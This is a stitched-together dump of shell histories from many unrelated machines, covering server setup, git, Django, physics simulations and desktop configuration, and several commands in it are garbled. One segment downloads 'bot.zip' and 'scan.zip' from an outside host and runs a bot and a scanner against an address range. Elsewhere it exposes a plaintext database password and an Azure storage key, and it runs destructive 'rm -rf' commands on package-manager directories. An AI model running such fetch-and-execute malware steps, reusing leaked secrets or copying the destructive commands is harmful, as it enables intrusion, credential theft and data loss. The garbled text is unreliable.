+kinit Administrator +net ads join -k +systemctl start sssd.service +klist +net ads join -k +net ads join -U mohit.thakur +net ads join -U sumit.kumari +net ads join -U tarandeep.singh +net ads join +net ads join -k +getent UnlockM3@DC administrator +getent administrator +getent --help +su - sumit.kumari +netstat -palnt +apt-get install apach2 +apt-get install apache2 +service apache2 restart +netstat -palnt +ip a +apt install git +history grep |git config --global +history grep |git config +git config --global sumit.kumari "sumit.kumari@cloudsmartz.net" +git config --global sumitkumari "sumit.kumari@cloudsmartz.net" +git config --global sumit.kumari "sumit.kumari@cloudsmartz.net" +git init --bare sumit-kumari +git init --bare --shared sumit-kumari +a2enmod mod_cgi +apt-get install apache2-utils +a2enmod cgi alias env +a2enmod mod_cgi +a2enmod cgi +apt-get install curl +curl +enable mod_cgi +a2ensite mod_cgi +a2enmod mod_cgi +a2enmod mod_alias +apt-get purge apache2 +ll +rm -rf index.html +rm -rf index.html +apt-get purge apache2 +sudo apt autoremove +apt-get install apache2 apache2-utils +a2enmod cgi alias env +SetEnv GIT_PROJECT_ROOT /opt/git +ip a +ll +vim 000-default.conf +vim default-ssl.conf +vim 000-default.conf +vim /etc/apache2/apache2.conf +vim 000-default.conf +ip a +git clonesumit-kumari/git/projects/test +ls +ls -la +git clonesumit-kumari/git/ +history | grep bare +ls -la +mkdir git +ll +git init +git add *.c +touch file1.txt +git add file1.txt +git commit -m 'initial change' +git remote add originsumitkumari/first-repo.git +ll +ll +push -u origin master +apt install heimdal-clients +push -u origin master +ll +ll +rm -rf git/ +ll +echo "# remote" >> README.md +mkdir git +echo "# remote" >> README.md +git add README.md +git add README.md +git init +git add README.md +git commit -m "first commit" +touch file1.txt +git add README.md +git add file1.txt +git commit -m "first commit" +git remote add originsumitkumari/remote.git +git push -u origin master +ll +ll +ll +ll +git clone sumitkumari/git/test1 +git clone sumitkumari/test1 +ll +ll +rm -rf test1 +ll +rm -rf test1/ +ll +ll +ll +rm -rf .git/ +git clone sumitkumari/test1 +ll +ll +ll +mv /root/git/ /var/www +git config http.receivepack true +git config http.receivepack true +vim /etc/apache2/sites-available/000-default.conf +find /-name git +find /-name "*.git" +find /-name git +vim /etc/apache2/sites-available/000-default.conf +apache2 -h +apache2 -M +vim /etc/apache2/apache2.conf +vim /etc/apache2/sites-available/000-default.conf +htdigest -c /opt/git/.htpasswd "Git Access" sumit.kumari +ls -la +git clonesumitkumari/hello-world /opt/git/project.git +ll +ll +ll +rm -rf git/ +ll +git clone --bare my_project sumitkumari.git +git clone --bare sumitkumari sumitkumari.git +git clone --bare docker-mvn docker-mvn.git +ll +mkdir rprs +git init rprs/ +ll +rm -rf rprs/ +t subdirectory. +git init --bare --shared rpmv +ll +ll +git clone --bare rpmvsumitkumari/docker-mvn +ll +ll +ll +ll +ll +ll +rm -rf https\:/ +ls -la +git clone --bare rpmv docker-mvn +ll +ll +rm -rf docker-mvn/ +git clone --bare rpmv docker-mvn.git +ll +cp -Rf rpmv/.git docker-mvn.git/ +ll +cp -Rf rpmv/.git my_project.git +cp -Rf rpmv/ docker-mvn.git/ +ll +ll +ll +ssh docker@ +service ssh restart +ssh docker@ +ll +ll +cat authorized_keys +ssh docker@ +ssh docker@ +ip a +scp -r docker-mvn.git docker@ +git --bare init +git --bare --shared init +ll +vim /etc/apache2/sites-available/000-default.conf +htpasswd -c /opt/git .git-htpasswd sumit.kumari +ll +mkdir git +htpasswd -c /opt/git .git-htpasswd sumit.kumari +ll +htpasswd -c /opt/git .git-htpasswd sumit +htpasswd -c /opt/git .git-htpasswd ubuntu +htpasswd -c /opt/git/.htpasswd sumitkumari +htpasswd -c /opt/git/.htpasswd sumit.kumari +ll +cat .htpasswd +ll +ll +ll +mv docker-mvn.git/ /opt/git +ll +vim /etc/apache2/sites-available/000-default.conf +ll +vim git-http-backend +git-instaweb[1] +git-instaweb +apt-get install gitweb +ll +ll +vim /etc/gitweb.conf +ll +ll +ll +ll +ls -la +l +ll +ll +git instaweb --httpd=webrick +git instaweb --httpd=docker-mvn +git instaweb --httpd=docker-mvn.git +ll +ll +rm -rf /opt/git/ +mv /var/www/git/ /opt +ll +ll +ll +htpasswd -c /opt/git/.htpasswd sumit.kumari +ll +cat .htpasswd +lighttpd +apt install lighttpd +apt install lighttpd +rm -rf /var/lib/dpkg/ +apt install lighttpd +rm -rf /var/lib/dpkg/lock +ll +apt-get update +apt install lighttpd +apt-get clean +dpkg --configure -a +rm -rf /var/cache/apt/archives/lock +rm -rf /var/cache/apt/archives +dpkg --configure -a +apt install lighttpd +pwd +sudo apt install lighttpd +ps -u root +ps aux | grep apt + +sudo apt install lighttpd +rm -rf /var/lib/dpkg/lock /var/lib/dpkg/ +apt-get update +dpkg --configure -a +ps -e | grep -e apt -e adept | grep -v grep +ps -aux | grep 'apt-get' +kill -9 11576 +kill -9 11328 +rm /var/lib/apt/lists/lock +ps -A | grep apt +rm /var/lib/dpkg/lock +apt-get upgrade +rm /var/lib/dpkg/lock +apt-get upgrade +rm -rf /var/lib/dpkg/ +rm -rf /var/lib/dpkg/lock +ps -A | grep apt-get +ps -aux | grep 'apt-get' +kill -9 11600 +ps -e | grep -e apt -e adept | grep -v grep +apt-get update +ps aux | grep apt +kill 11857 +kill -9 11857 +lsof /var/lib/apt/lists/lock +lsof /var/lib/dpkg/lock +pgrep apt-get -a +pgrep -a apt-get +apt-get update && apt-get upgrade +ps -aux | grep 'apt-get' +sudo kill -9 12118 +kill -9 12118 +rm /var/lib/apt/lists/lock +ps -A | grep apt +apt-get update +apt-get install gitweb +apt-get dist-upgradecd +apt-get dist-upgrade +apt-get update +ps -e | grep -e apt -e adept | grep -v grep +rm /var/lib/dpkg/lock +rm /var/cache/apt/archives/lock +ps -u root +sudo killall +sudo kill acpid +ps aux | grep apt +kill -9 12622 +ps aux | grep "$appName" | grep -v 'grep' +kill "$37364" +kill "$3344" +kill -15 12624 +kill -s 15 8 +apt-get update +ll +ll +ll +ll +ll +rm -rf /var/lock/ +history | grep dpkg +ll +ll +ll +s aux | grep apt +ps aux | grep apt +kill -15 13014 +ip a +apt-get update +reboot +apt-get upgrade +apt-get update +rm -rf /usr/lib/dpkg/ +apt-get update +rm -rf /var/lock/ +apt-get update +apt-get clean +apt-get update +apt-get upgrade +dpkg --configure -a +apt-get -f install +apt-get update && apt-get upgrade +sudo rm /var/lib/dpkg/ +sudo dpkg --set-selections < package.list && apt-get dselect-upgrade +whoami +ps -e | grep -e apt -e adept | grep -v grep +fuser -cv /var/lib/dpkg/lock +fuser -cv /usr/bin/dpkg +kill -9 1040 +kill -9 1094 1123 1127 1138 1139 1346 +kill -9 kworker/0:1 +kill -9 2912 2915 +kill -9 1496 1495 753 +mysqldump -u manggorio -p '!QAZ2wsx3edc' -h localhost wp_myblog > joe.sql +bye +exit +mysqldump -u manggorio -p '!QAZ2wsx3edc' -h localhost wp_myblog > joe.sql +mysqldump -u manggorio -p 'QAZ2wsx3edc -h localhost wp_myblog > joe.sql +ls +ls +sudo mkdir /mnt/manngoriostorage +if [ ! -d "/etc/smbcredentials" ]; then sudo mkdir /etc/smbcredentials; fi +if [ ! -f "/etc/smbcredentials/manngoriostorage.cred" ]; then sudo bash -c 'echo "username=manngoriostorage" >> /etc/smbcredentials/manngoriostorage.cred'; sudo bash -c 'echo "password=+vH3cUhWs5mVK0g1ey4bR3LrfFw00eTCwYf+IuDa+Ag8CR9xh+w9xsgginx7n9vvFIhqfdtqKpYNxxpimgyp1g==" >> /etc/smbcredentials/manngoriostorage.cred'; fi +sudo chmod 600 /etc/smbcredentials/manngoriostorage.cred +sudo bash -c 'echo "//manngoriostorage.file.core.windows.net/manggoriofileshare /mnt/manggoriofileshare cifs nofail,vers=3.0,credentials=/etc/smbcredentials/manngoriostorage.cred,dir_mode=0777,file_mode=0777,serverino" >> /etc/fstab' +exit +top +sudo apt-get updat +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +sudo reboot +sudo apt-get update +sudo apt-get upgrade +sudo apt-get linux-headers-server +sudo apt-get install linux-headers-server +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install linux-server +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install python-software-properties +sudo add-apt-repository ppa:campos-dev/ppa +sudo add-apt-repository ppa:campos-dev/campos +sudo apt-get update +sudo apt-get install gpaw +sudo apt-get update +sudo apt-get install python-ase +sudo apt-get install gpaw-setups +sudo apt-get install ssh +sudo apt-get install openmpi + +reboot +sudo reboot +scp -r renat@fii.fi.tartu.ee:amAu111BF4 ~/amAu111BF4 +ls -l +ls -l +sudo rm renat@fii.fi.tartu.ee +sudo rm -r renat@fii.fi.tartu.ee +ls -l +exit +ls +ls +less 22.py +sudo ls +ls +less 8Si.py +ls ~ +ls /home/dirac/amAu111BF4/22.py +less /home/dirac/amAu111BF4/22.py +less 8Si.py +less 2Al.py +ls +ls +ls +less 22.py +less 64.py +mpirun -np 1 gpaw-python 22.py > log.txt & +tail -f log.txt +top +tail -f log.txt +less log.txt +top +mpirun -np 1 gpaw-python 22.py +mpirun -np 8 gpaw-python 22.py +top +ping www.yahoo.com +sudo ifconfig up +sudo ifconfig etho up +sudo ifconfig eth0 up +ifconfig +ping www.yahoo.com +sudo ifconfig eth0 up +sudo ifconfig up +sudo /etc/init.d/networking restart +ping www.yahoo.com +sudo /etc/init.d/networking restart +sudo /etc/init.d/networking star +sudo service networking start +ping www.yahoo.com +sudo service networking stop +history +history | less +ping www.yahoo.com +ifconfig +ls /etc/network/interfaces +less /etc/network/interfaces +sudo ifup etho0 +sudo ifup eth0 +sudo restart now +sudo restart +sudo restart -h +sudo restart --help +sudo shutdown now +ping www.yahoo.com +sudo ifup eth0 +ping www.yahoo.com +sudo ifup eth0 +sudo ifup eth3 +sudo ifup eth0 +modprobe e1000 +sudo ifup eth0 +whereis dhcpcd +dmesg | less +man dmesg +ifconfig -a +sudo ifup eth1 +ping www.yahoo.com +sudo ifup eth1 +sudo ifup eth0 +sudo ifup eth1 +sudo ifconfig up eth1 +sudo ifconfig --help +sudo ifconfig --help | less +sudo ifconfig --help 2>&1 | less +sudo ifconfig eth1 up +ping www.yahoo.com +sudo ifconfig eth2 up +sudo ifconfig eth0 up +sudo ifconfig eth3 up +ping www.yahoo.com +sudo service networking restart +sudo service networking stop +ping www.yahoo.com +sudo /etc/init.d/networking +sudo /etc/init.d/networking restart +sudo ifconfig +ls /etc/network/interfaces +less /etc/network/interfaces +ifconfig eth0 up +ifconfig eth1 up +sudo ifconfig eth0 up +whereis eth1 +clear +sudo ifconfig up +lshw +lshw | grep eth +sudo nano /etc/network/interfaces +sudo /etc/init.d/network restart +sudo /etc/init.d/networking restart +sudo nano /etc/network/interfaces +sudo /etc/init.d/networking restart +ping www.yahoo.com +man /etc/network/interfaces +apt-get install lynx +sudo apt-get install lynx +wgets/collectd-5.0.0.tar.gz +ls +tar -xzf collectd-5.0.0.tar.gz +ls +less README +./configure +make all +sudo make install +ls +less etc/collectd.conf +sudo less etc/collectd.conf +sudo apt-get install librrd2-dev +less /opt/collectd/etc/collectd.conf +sudo less /opt/collectd/etc/collectd.conf +ls +ls +sudo make remove +sudo make uninstall +sudo rm -rf /opt/collectd/ +./configure | tee out.text +less out.text +sudo apt-get install librrd2-dev +./configure | tee out.text +less out.text +make clean +make +make all +sudo make install +less /opt/collectd/etc/collectd.conf +sudo less /opt/collectd/etc/collectd.conf +sudo less /etc/init.d/networking +ls +ls +ls etc/ +sudo find . -name collectd +less sbin/collectd +less include/collectd/ +less /etc/rc.local +ls -al /etc/rc.local +sudo /opt/collectd/sbin/collect +top +less etc/collectd.conf +sudo less etc/collectd.conf +whereis rrdtool +history | grep rrd +apt-get install rrdtool +sudo apt-get install rrdtool +rrdtool +rrdtool graph +rrdtool graph | less +rrdtool graph var/lib/collectd/dirac.lan/cpu-0 +ls +rrdtool grep tessh localhost +ls +ls +mpirun -np 4 gpaw-python 22.py +top +ls -la /opt/collectd/var/lib/collectd/dirac.lan/cpu-0/cpu-idle.rrd +date +ps auwx | grep collectd +ls +less rc.local +ls +grep collectd * + +grep collectd * -Ir +ls ../rc.local +less ../rc.local +ls +ls +mpirun -np 2 gpaw-python 22.py +ls -la 22.txt +date +less 22.txt +top +gpaw-python 22.py +gpaw-python -np 22.py > out.txt +mpirun -np gpaw-python 22.py > out.txt +ls +mpirun -np 2 gpaw-python 22.py > out.txt +less 22.py +mpirun -np 2 gpaw-python 22.py > out.txt +ifconfig +nslookup localhost +ping www.yahoo.com +sudo service networking restart +ping www.yahoo.com +sudo service networking stop +sudo service networking start +ping www.yahoo.com +sudo /etc/init.d/networking restart +ping www.yahoo.com +ifconfig +ls +unzip Attachments_2011_04_19.zip +sudo apt-get install unzip +unzip Attachments_2011_04_19.zip +top +ls +mpirun -np 2 Bi-4-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +top +mpirun -np 2 gpaw-python Bi-4-8nodes.py +less Bi-4-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +mpirun -np 8 gpaw-python Bi-4-8nodes.py +ls +less Bi111dl-1.65.txt +mpirun -np 2 gpaw-python da-k-4nodes.py +mpirun -np 2 gpaw-python da-k-4nodes.py | tee out.txt 2>&1 +less out.txt +mpirun -np 2 gpaw-python da-k-4nodes.py 2>&1 | tee out.txt +less out.txt +ls da-k-4nodes.py +less da-k-4nodes.py +less da-k-2nodes.py +less dl-k-2nodes.py +mpirun -np 2 gpaw-python dl-k-2nodes.py +top +mpirun -np 2 gpaw-python da-h-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +mpirun -np 2 gpaw-python da-h-8nodes.py +mpirun -np 2 gpaw-python dl-k-2nodes.py +top +ls +ls -la +date +ls +rm collectd-5.0.0.tar.gz +rm -rf collectd-5.0.0/ +ls +ps auwx | grep collectd +grep * -Ir collectd +grep -Ir collectd * +grep -Ir collectd * +ls +ls -la +sudo nano collectd +ifconfig +sudo cp /home/dirac/collectd . +chmod a+xr collectd +sudo chmod a+xr collectd +sudo chown root collectd +ls -la +ls -la | collectd +ls -la | grep collectd +ps auwx | grep collectd +sudo service collectd start +whereis collectd +sudo nano collectd +sudo service collectd start +ps auwx | grep collectd +sudo /etc/init.d/collectd start +ps auwx | grep collectd +sudo nano collectd +sudo /etc/init.d/collectd start +sudo nano collectd +sudo /etc/init.d/collectd start +ps auwx | grep collectd +sudo /etc/init.d/collectd stop +ps auwx | grep collectd +sudo nano collectd +man update-rc.d +sudo update-rc.d collectd defaults +sudo shutdown now +ls +ls +ls +man pidof +ls +less ssh +grep stat_busy * +less bootlogd +grep stat_fail * +ls +nano bootlogd +less cron +top +ls +less 42.txt +ls -la +less amAu111BF4/42.py +less amAu111BF4/22vdw.py +ls +ls -la +top +ls +ls +python3 +python +apt-get install pip +sudo apt-get install python3-pip +apt-get install python3-pip +apt-get install python3-pip --root +apt-get install python3-pip --user +man sudo_root +apt-get install python3-pip --sudo_root +sudo apt-get install python3-pip +sudo apt-get install pip +sudo apt-get install python3-pip +sudo apt-get install python3-pip3 +sudo apt-get install python-pip3 +sudo apt-get install pip3 +apt-get install python3-pip +apt-get install python3-pip --user +apt-get install python3-pip --admin +apt-get install python3-pip3 +apt-get install pip3 +apt-get install pip3 --user +apt-get install pip3 -user +curl +python get-pip.py +python3 get-pip.py +python3 get-pip.py --user +pip install requirements.txt +pip install -r requirements.txt +pip install -r requirements.txt --user +python3 manage.py runserver +sudo python3 manage.py runserver +ifconfig +sudo python3 manage.py runserver 8080 +clear +python3 manage.py makemigrations +clear +python3 manage.py makemigrations +ifconfig +ping +sudo apt-get update +sudo apt-get install postgresql +sudo -u quest psql postgres +sudo -u postgres psql postgres +ls +ls +/etc/postgresql/9.6/main/pg_hba.conf +nano /etc/postgresql/9.6/main/pg_hba.conf +ls +ls +ls +sudo nano pg_hba.conf +udo service postgresql restart +sudo service postgresql restart +sudo -u postgres psql postgres +ls +python3 manage.py makemigrations +python3 manage.py migrate +python3 manage.py runserver +ifconfig +python3 manage.py runserver +sudo -u postgres psql postgres +sudo netstat -plunt |grep postgres +sudo -u postgres psql postgres +ls +ls +ls +ls +sudo nano pg_hba.conf +ls +sudo nano postgresql.conf +sudo service postgresql restart +sudo -u postgres psql postgres +ls +sudo nano postgresql.conf +sudo service postgresql restart +python3 manage.py runserver +python3 manage.py migrate +python3 manage.py runserver +python3 manage.py migrate +python3 manage.py runserver +ls +python3 manage.py migrate +python3 manage.py runserver +host +.. +python3 manage.py +python3 manage.py runserver +ls +sudo apt-get install screen +screen -dm python3 manage.py runserver +screen -dm python3 manage.py runserver +screen -r 23520 + +screen -ls +pkill screen +screen -ls +python3 manage.py runserver +service postgresql status +ls +python3 manage.py runserver +ifconfig +python3 manage.py runserver +python3 manage.py collectstatic +sudopython3 manage.py collectstatic +sudo python3 manage.py collectstatic +python3 manage.py runserver +ls +python3 manage.py runserver +ls +python3 manage.py runserver +screen -dm python3 manage.py runserver +python3 manage.py runserver +screen -dm python3 manage.py runserver +screen -dm python3 manage.py runserver +screen -list +screen -X -S 1200 quit +screen -list +screen -X -S 18427 quit +screen -dm python3 manage.py runserver +exit +exit +rm ~/.xinitrc +ls +ls -all +startx +exit +sudo pacman -S ttf-dejavu +pacman -Ss font +pacman -S ttf-monaco +sudo pacman -S ttf-monaco +sudo pacman -S ttf-monaco +sudo pacman -S ttf-vista-fonts +sudo pacman -S slim +sudo systemctl enable slim +reboot +sudo reboot +exit +exit +exit +mkdir -p ~/.config/openbox +cp /etc/xdg/openbox/{rc.xml,menu.xml,autostart,environment} ~/.config/openbox +sudo pacman -S openbox +cp /etc/xdg/openbox/{rc.xml,menu.xml,autostart,environment} ~/.config/openbox +startx +nano ~/.xinitrc +cp /etc/skel/.xinitrc ~ +nano ~/.xinitrc +sudo reboot +sudo pacman -S firefox-i18n-nl +mmaker -vf OpenBox3 +sudo pacman -S menumaker +sudo pacman -S tk +sudo pacman -S tcl +sudo pacman -S screen +sudo pacman -S vnstat +sudo pacman -S git +sudo pacman -S subversion +sudo pacman -S python +sudo pacman -S python2 +sudo pacman -S +sudo pacman -S Guake +sudo pacman -S terminator +sudo pacman -S mc +sudo pacman -S zip p7zip +sudo pacman -S zip rar +sudo pacman -S gd +sudo pacman -S imagemagick +sudo pacman -S libpng +sudo pacman -S openoffice +sudo pacman -S mono +sudo pacman -S mono=develop +sudo pacman -S mono-develop +sudo pacman -S mono-dev +sudo pacman -S monodevelop +sudo pacman -S vlc +sudo pacman -S libnotify +sudo pacman -S xfce4-notifyd +xfce4-notifyd-config +sudo pacman -S thunderbird thunderbird-i18n-nl +mmaker -vf OpenBox3 +nano /etc/X11/xorg.conf.d/10-evdev.conf +sudo nano /etc/X11/xorg.conf.d/10-evdev.conf +ping -c 1 www.google.com +ping -c 10 www.google.com +sudo pacman -Sy +sudo pacman -S firefox +firefox +firefox +sudo reboot +sudo pacman -S flashplugin +sudo pacman -S jre7-openjdk +sudo pacman -S virtualbox +sudo pacman -S alsa-utils +sudo pacman -S alsa-utils alsa-plugins +mmaker -vf OpenBox3 +git config --global user.name "WaterRatj" +git config --global user.email "ni8813r@gmail.com" +ssh-keygen +sudo pacman -S openssh +sudo nano /etc/ssh/ssh_config +ssh-keygen -t rsa -C "ni8813r@gmail.com" +sudo pacman -S xclip +xclip -sel clip < ~/.ssh/id/rsa.pub +xclip -sel clip < ~/.ssh/id_rsa.pub +ssh -T git@github.com +sudo pacman -Sy +sudo pacman -S gimp +sudo pacman -S vnstat +ip linjk +ip link +ip link +ip addr +vnstat -u -i enp3s0 +sudo vnstat -u -i enp3s0 +sudo systemctl start vnstat.service +vnstat -q +ssh waterratj@ +mc +sudo reboot +ssh waterratj@ +pacman -Sy +sudo pacman -Sy +sudo pacman -S gpick +man terminator +fdisk -l +sudo fdisk -l +sudo fdisk -l +mount /dev/sdb1 /mnt +mount -o gid=users,fmask=113,dmask=002 /dev/sdb1 /mnt +sudo mount -o gid=users,fmask=113,dmask=002 /dev/sdb1 /mnt +ls +sudo umount /dev/sdb1 +fdisk -l +sudo fdisk -l +ls +git config --global core.editor +sudo git config --global core.editor +sudo git config --global core.editor +sudo git config --global core.editor "nano" +sudo git config --global core.editor "nano -w" +sudo git config --global color.ui true +clear +sudo su - +u - +sudo su - +pwd +sudo su - +mkdir testrepo +vi dummy.txt +git init +git add . +git commit -m "first commit" +git remote show +ssh.keygen +ls +cat authorized_keys +git remote add originshagitrepo/test.git +git remote show +git push -u origin master +ls +ls +ls +rm -r dummy.txt +ls +git add . +git commit -m "second commit" +git push -u origin master +ls +pwd +pwd +sudo su - +echo 'export PATH=$PATH:~/pintos/src/utils/'>>~/.bashrc +source ~/.bashrc +dir +pintos -v -- -q run alarm-multiple +ls +tar xvf pintos.tar.gz +wgets.kaist.ac.kr/~byunggill/pintos.tar.gz +tar xvf pintos.tar.gz +ls +dir +dir +dir +echo 'export PATH=$PATH:~/pintos/src/utils/'>>~/.bashrc +source ~/.bashrc +pintos -v -- -q run alarm-multiple +dir +dir +vim ~/.bashrc +source ~/.bashrc +dir +dir +dir +#make check +make check +make grade +ls +ls +ls +ls +vim results +vim grade +ls +ls +ls +ls +vim Make.tests +vim Grading +vim Make.tests +ls +make check +make clean +make check +ls +vim Make.tests +make clean +make check +make grade>result +ls +vim tests.c +vim tests.h +make clean +make check +vim tests.c +vim tests.h +ls +vim Grading +vim Make.tests +ls +make clean +make check +vim ~/.bashrc +source ~/.bashrc +make check +make clean +make check +exit +make clean +make check +ls +ls +ls +make clean +make check +vim ~/.bashrc +source ~/.bashrc +vim ~/.bashrc +source ~/.bashrc +make clean +make check +vim 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+kill 20163 +ps -ef +kill 20164 +kill 20165 +exit +d.zoom +ps +ps +exit +exit +d.zoom +ls +ls +ls +ls +more ColimaR +exit +d.zoom +d.zoom +exit +restart +--help +help +logout +apt get update +apt-get update +apt-get upgrade +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +shutdown +sudo add-apt-repository "debsb_release -sc) partner" +sudo apt-get update +sudo add-apt-repository "debsb_release -sc) partner" +apt-get update +apt-get install flashplugin-installer +sudo apt-get install flashplugin-installer +sudo vi /etc/apt/sourses.list +sudo gedit /etc/apt/sources.list +sudo apt-get update +sudo apt-get install flashupdate-installer +sudo apt-get install adobe-flashplugin +sudo apt-get install git-core +sudo apt-get install python-software-properties +sudo add-apt-repository ppa:chris-lea/node.js +sudo apt-get update +sudo apt-get install nodejs npm +sudo apt-get install nodejs +sudo apt-get install npm +sudo apt-get install eclipse +sudo npm install -g express +mkdir -p ~/node +express first-app +sudo cd first-app && npm install +sudo sd first-app && npm install +sudo cd first-app && npm install +dir +dir ~/home +dir ~/ +dir +dir /home/mylinux +dir home/mylinux/workspace +mkdir -p ~/node +mkdir -p ~/workspace/node +express first-app +sudo cd first-app && npm install +npm install +sudo npm install +node app +w +uname -a +cat /proc/cpuinfo +cat /etc/issue +passwd +wget +tar +wgetsoft.com/download/1/b/c/1bc0b1a3-c839-4b36-8f3c-19847ba09299/MPSetup.exe +uname -a +w +wget xxxg.ucoz.com/bot.zip +unzip bot +chmod +X * +chmod +x * +./crond +cat /etc/hosts +cat /proc/cpuinfo +wget xxxg.ucoz.com/scan.zip +unzip scan +chmod +x * +screen +./screen +./a 202.89 +touch test +rm test +ls -al +sudo su - +ls -ltr +sudo vi django.service +l s-ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +cat django.service +ls -ltr +sudo vi django.service +sudo systemctl start django.service +sudo systemctl enable django.service +service django status +ls -ltr +ls -ltr +ls -ltr +cat settings.py +more settings.py +! +vi settings.py +sudo vi settings.py +clear +ls -ltr +sudo vi settings.py +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +vi settings.py +pwd +sudo vi settings.py +ls -ltr +ls -ltr +ls -ltr +more settings.py +sudo vi settings.py +service django restart +sudo service django restart +sudo su - +ls -ltr +ls -ltr +sudo su - +pwd +ls +ls +sudo vi gulpfile.js +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +pqs +pwd +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +pwd +sudo vi ../../../../../../gulpfile.js +ls +pwd +sudo vi ../../../../../../gulpfile.js +ls +ls +pwd +gulp +npm +sudo apt-get install npm +npm install gul[ +npm install gulp +pwd +ls +gupl +gulp +sudo vi ../../../../../../gulpfile.js +pwd +gulp +gulp install +bower install +gulp update +gulp install gulp-webp +pwd +ls +npm install gulp +sudo npm install gulp +gulp +gulp install gulp-webp +gulp install webp +gulp install --save-dev gulp-webp +gulp +sudo vi gulpfile.js +npm install --save-dev gulp-we +sudo npm install --save-dev gulp-webp +gulp +sudo npm install --save-dev gulp-gzip +gulp +sudo npm install --save-dev gulp-sass +gulp +sudo npm install --save-dev gulp-concat +gulp +sudo npm install --save-dev gulp-uglify +gulp +sudo npm install --save-dev gulp-uglifycss +gulp +sudo npm install --save-dev browser-sync +gulp +gulp --local +gulp --local. +sudo vi gulpfile.js +q +ls +sudo vi gulpfile.js +gulp +sudo gulp +pwd +ls +ls +ls +ls +ls +ls +sudo vi index.php +ls +ls +ls +ls +pwd +ls +ls +ls +ls +sudo vi class-wpd-product.php +ls +ls +ls +ls +ls +git remote +git pull bitbucket master +sudo git pull bitbucket master +git stash +sudo git stash +sudo git pull bitbucket master +gulp +sudo gulp +bower +bower install +sudo bower install +sudo bower +bower +bower install +ls +vi bower.json +bower.json +bower install +sudo bower install +sudo gulp +sudo bower +sudo bower install +npm install bower +sudo npm install bower +sudo bower install +sudo npm install bower +sudo bower install +gulp +sudo gulp +sudo gulp styles +bower update +bower install +sudo bower install +sudo npm install bower +sudo bower install +bower +npm install bowwer +sudo npm install bower +sudo npm install -g bower +npm install bowwer +sudo bower install +sudo bower install --allow-root +sudo gulp +ls +sudo vi gulpfile.js +ls +pwd +sudo vi gulpfile.js +sudo gulp +pwd +ls +pwd +ls +pwd +ls +pwd +ls +pwx +wd +pwd +sudo vi gulpfile.js +sudo gulp +ls +pwd +ls +pwd +ls +pwd +ls +ls +ls +ls +ls +ls +ls +suso vi functions.php +sudo vi functions.php +npm install +sudo npm install +pwd +ls +ls +ls +ls +s +ls +s +ls +ls +sudo vi index.php +ls +sudo vi index.php +ls +ls +ls +pwd +ls +ls +ls +ls +ls +pwd +ls +ls +ls +ls +ls +ls +\ls +ls +ls +ls +ls +ls +ls +pwd +ls +ls +ls +ls +ls +ls +ls +ls +pwd +ls +pwd +ls +ls +pwd +ls +ls +ls +ls +pwd +ls +pwd +ls +ls +ls +pwd +ls +ls +ls +pwd +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls 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add githubstello/presto.git +ls +pwd +git add . +sudo git add . +sudo git commit -m "changed settings for wpd" +pwd +git push github master +sudo git push github master +pwd +ls +pwd +ls +pwd +ls +mysql -u root -p +ls +mysqldump -u root -p plasticc_box_stage > plasticc_box_stage.sql +sudo mysqldump -u root -p plasticc_box_stage > plasticc_box_stage.sql +sudo sudo mysqldump -u root -p plasticc_box_stage > plasticc_box_stage.sql +ls +sudo mysqldump -u root -p plasticc_box_stage > plasticc_box_stage.sql +ls +sudo cp plasticc_box_stage.sql /var/www/presto/ +ls +ls +pwd +ls +ls +git push github master +ls +sudo ls +sudo git push github master +pwd +ls +git add . +sudo git add . +sudo git commit -m "adding database to commit" +sudo git branch +git remote +sudo git push github master +ls +pwd +ls +pwd +ls +pwd +ls +pwd +ls +pwd +ls +ls +ls +ls +ls +ls +ls +sudo vi extra.js +pwd +ls +history OR +ls /excalibur/ +ls -la /excalibur/ +ls -la /usr/local/lib/python3.7/dist-packages/excalibur/www/ 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www/static/js/rules.js +less www/static/js/job.js +less www/static/js/workspace.js +less ../camelot/cli.py +less www/static/js/workspace.js +less www/app.py +less www/views.py +less www/__init__.py +less www/templates/base.html +less www/templates/files.html +less www/templates/job.html +less www/templates/jobs.html +less www/templates/rules.html +less www/templates/workspace.html +less www/static/js/files.js +less executors/sequential_executor.py +less cli.py +less operators/python_operator.py +less tasks.py +less cli.py +less core.py +less handlers.py +less utils.py +less parsers/ +less parsers/stream.py +less parsers/lattice.py +less parsers/base.py +less parsers/__init__.py +less io.py +less __main__.py +less image_processing.py +ll +vim cli.py +/usr/bin/edit cli.py +ls +less cli.py +less tasks.py +less tasks.py +composer require phpmailer/phpmailer +ls +mkdir vendor +ls +nano composer.json +ls +l +ls +l +sll +ll +ls +composer install +composer install +nano composer.json +composer install +ls +ls +ls +cp ./composer.json ../ +ls +rm -R ./vendor/ +ls +composer install +ls +ls +ls +nano gmail.php +ls +ls +nano gmail.php +ls +nano gmail.php +passwd +exit +ls +exit +sudo composer require phpmailer/phpmailer +exot +exit +ls +ls +mv ./PHPMailer/examples/gmail.php ./ +ls +pip install Flask +ls +sudo su +ls +cat index.php +cat gmail.php +ls +nano app-running-19-07-2018.py +mkdir baru +ls +nano web.py +ls +ls +vi docker-compose.yml +exit +pwd +clear +yum update -y +exit; +ls -ltr +touch hahaha +exit +rm -fr hahaha +ls -ltr +exit +ls +ssh-keygen +more /opt/smartforceplus/.ssh/id_rsa.pub +git remote add origin git@github.com:smatforce/SmartForceplus.git +git push origin master +git pull origin master +ls +git push origin master +git remote add origin git@github.com:smatforce/SmartForceplus.git +git push origin master +git remote add origin smartforce@github.com:smatforce/SmartForceplus.git +git push origin master +git push -f +git push origin master +ls +ls -al -h +cat crontab +more /var/script.sh +vi /var/script.sh +su - postgres -c "pg_dump smartforceplus > /opt/smartforceplus/smartforceplus-sql-$din" +exit +git add . +git commit -m 'Hamid commits' +git push origin master +git commit -m 'Comitted By 